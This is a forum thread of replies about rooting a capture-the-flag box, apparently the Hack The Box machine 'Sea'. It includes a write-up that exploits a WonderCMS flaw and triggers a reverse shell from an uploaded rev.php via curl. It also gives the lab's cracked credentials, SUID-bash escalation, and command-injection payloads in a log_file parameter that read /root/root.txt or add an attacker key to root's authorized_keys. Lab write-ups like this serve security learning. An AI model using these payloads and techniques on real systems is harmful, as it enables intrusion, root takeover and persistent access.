[peRd1]

lol only me after foothold did /usr/bin/bash -p and got root lol

lmao wth ? how does this even work...

Because user was playing on a public server and somebody before already chmod u+s the bin/bash, SUID perms.

[orangeee23]

After tunneling to port 8080, I used the command /bin/bash -p and immediately gained root access.

[fuliye]

what is the command injection ???i can not use it

Intecept the log analyzer and inject your command into the log_file= parameter. like this(log_file=;cat+/root/root.txt;id&...)
Tried it with nc but the session wasn't stable.

Or just look up two post before and use that solution.

ok bro ,thx for help

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[trevor69000]

easiest way is to go on http://127.0.0.1:8080  and login with amay and its password mychemicalromance 
use burp and inctercept the log analysis file and change it to 

a; cat /root/root.txt; b

[eFko]

I dont know how to get root...I have web ssh,where I found user amay, then I tried SSH for this user with password from website. It worked so I took flag for user, but I don't have any permission for access to root... Can you slightly push me forward? Iam noob and this is my first box excepts starting point.

[osamy7593]

lol only me after foothold did /usr/bin/bash -p and got root lol

lmao wth ? how does this even work...

some of those got root chomd u+x /bin/bash

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[MrNidus]

Did the exploit from the CVE github worked, i ended up using curl to the reverse shell cause never worked for me

[0bfusc8]

rooted this was pretty easy thanks 2 everybody contributing

[MrNidus]

Short Writeup:

User:
1. nmap scan: Port 80 / 22 open

2. feroxbuster / gobuster with small raft words list --> discover README / LICENCE of theme which reveals, that the site is running wondercms 3.2.0

3. a fast searchsploit / sploitus reveals that wondercms 3.2.0 is vuln. to CVE-2023-4145 (XSS/RCE) https://github.com/prodigiousMind/CVE-2023-41425

4. discover, that you don't need to exploit, but the rev.php is already uploaded here

http://sea.htb/themes/revshell-main/rev.php

  by default on the box (i reset the box to be sure)

5. open your netcat listener and curl on this address:

curl http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.10&lport=9001

and you should get a rev-shell as www-data

6. discover wondercms database under /data, which contains a bcrypt hash, which is crackable (hashcat -m 3200 HASH rockyou.txt), dont forget to take out backslashes: --> mychemicalromance

7. ssh in with

amay:mychemicalromance

Root:
1. enum box, discover with netstat -netlp, that port 8080 is open behind firewall

2. simple portforward with ssh from your machine:

ssh -L 7777:127.0.0.1:8080 amay@sea.htb

(the sea.htb box port 8080 is now connected to your 7777 port, so you can browse the site by going to 127.0.0.1:7777 on your machine); i chose this port, because 8080 is running burpsuite by default, so be careful

3. login on http basic auth with same creds amay:mychemicalromance and you see system-monitor webpage, which runs under root privileges; this can be assumed, because apt update etc. is possible

4. catch the analyze log post-request with burp, and find, that the post request is command injectable. you recieve some part of the php code, by just insert an wildcard (*) or dot in the

log_file=

parameter, which shows, that there is a simple system() call, which cats the given files, and runs it through grep, which should return lines, which contains certain objects like exec, system, etc.; if anything is returned, it is reflected on page

5. this post request is simple command injectable by:

analyze_log&log_file=; cat YOURSSHPUBLIC >> /root/.ssh/authorized_keys  #

( ";" = end previous command, "#" = comment out following grep), watch out to leave a space before "#"

6. ssh in by

ssh -i YOURKEY root@sea.htb

ofcourse you could also just insert a rev shell or set bash to setuid to escalate privileges.

hope this helps someone

Or even more dirty u can skip step 6 by doing 

analyze_log&log_file=; cat root/root.txt  #

that's not entirely correct, the output isn't reflected on the page. you could either copy the file, and change its permissions like:

cp /root/root.txt /dev/shm/flag.txt && chown amay:amay /dev/shm/flag.txt

or cat the output into a file on /dev/shm

trust me, i tried and it works

[ventaswebal2]

finally I have finished this machine this morning!